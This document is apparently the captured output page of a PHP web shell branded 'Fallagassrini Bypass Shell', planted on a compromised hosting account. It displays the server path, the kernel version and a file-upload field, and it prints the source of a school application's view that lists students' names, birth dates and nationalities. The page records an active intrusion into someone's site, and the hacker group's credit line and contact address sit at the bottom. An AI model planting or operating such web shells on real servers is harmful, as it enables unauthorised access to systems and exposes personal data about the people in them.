? Fallagassrini

Fallagassrini Bypass Shell

echo"
Fallagassrini
";
Current Path : /home1/savoy/public_html/savoyglobal.net/eduplus1/application/views/home/

Linux gator3171.hostgator.com 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64
Upload File :
Current File : /home1/savoy/public_html/savoyglobal.net/eduplus1/application/views/home/age_limit_alerts.php

<?php
if (!defined('BASEPATH'))
    exit('No direct script access allowed');
?>
<script>
    scrollToElement($('#dashboard_alert_div'));
    function scrollToElement(ele) {
        $(window).scrollTop(ele.offset().top).scrollLeft(ele.offset().left);
    }
    function close_alert(emp_id,row_id)
    {
        if (confirm("Are you sure you want to remove the alert?"))
        {
            $.ajax({
                type: "POST",
                url: "<?= site_url() ?>"+'/settings/alert_close/'+emp_id+"/age_limit/",
                success: function(msg)
                {
                        $('#'+row_id) .hide();
                }
            });}
    }

</script>
<div class="icons_main">
    <div class="icons">
        <img src="<?= base_url() ?>assets/images/back.png" title="Back" class="clickimage" onclick="view_page('home','dashboard','dashboard_alert_div')" alt="Back" align = "center" width="32" height="32"  />

    </div>
</div>
<div class="clean"></div>

<div class="grid_12">
    <div class="box">
        <div class="header main no-icon"> 
            <span>Age Limit Alerts</span>
        </div>
        <div class="content ">
            <table id="table-example" class="table"> 
                <thead>
                    <tr>
                        <th>SL NO</th>
                        <th>Reg NO</th>
                        <th>Student Name</th>
                        <th>Dob</th>
                        <th>Nationality</th>
                        <th>Gender</th>
                        <th>Remove</th>

                    </tr><thead>
                </thead>
                <tbody>
                    <?php
                    $check1 = $this->mastermodel->age_limit();
                    $i = 0;
                    foreach ($check1 as $list) {
                        $i++;
                        
                            echo "<tr id='close_alert_" . $i . "'><td>" . $i . "</td>
                                <td>" . $list['reg_no'] . "</td>
                                <td>" . $list['first_name']." ".$list['last_name'] . "</td>
                                <td>" . $this->mastermodel->convertdatenormalformat($list['dob']) . "</td>                         
                                <td>" . $this->mastermodel->get_single_field_value('nationality','nationality_name','nationality_id',$list['nationality_id']) . "</td>
                                <td>" . $list['gender'] . "</td>";
                      ?>      
                            <td><img class="clickimage" src='<?= base_url() ?>assets/images/delete-icon.png' onclick='close_alert("<?= $list['student_id'] ?>","close_alert_<?= $i ?>")'  title='Delete' width='20' height='20' alt='Delete' align = 'center'/></td>                           
                            </tr>
                        <?php
                    }
                    ?>
                </tbody>
            </table>
        </div>
    </div>
</div>








bypass 1.0, Devloped By El Moujahidin (the source has been moved and devloped)
Email: contact@elmoujehidin.net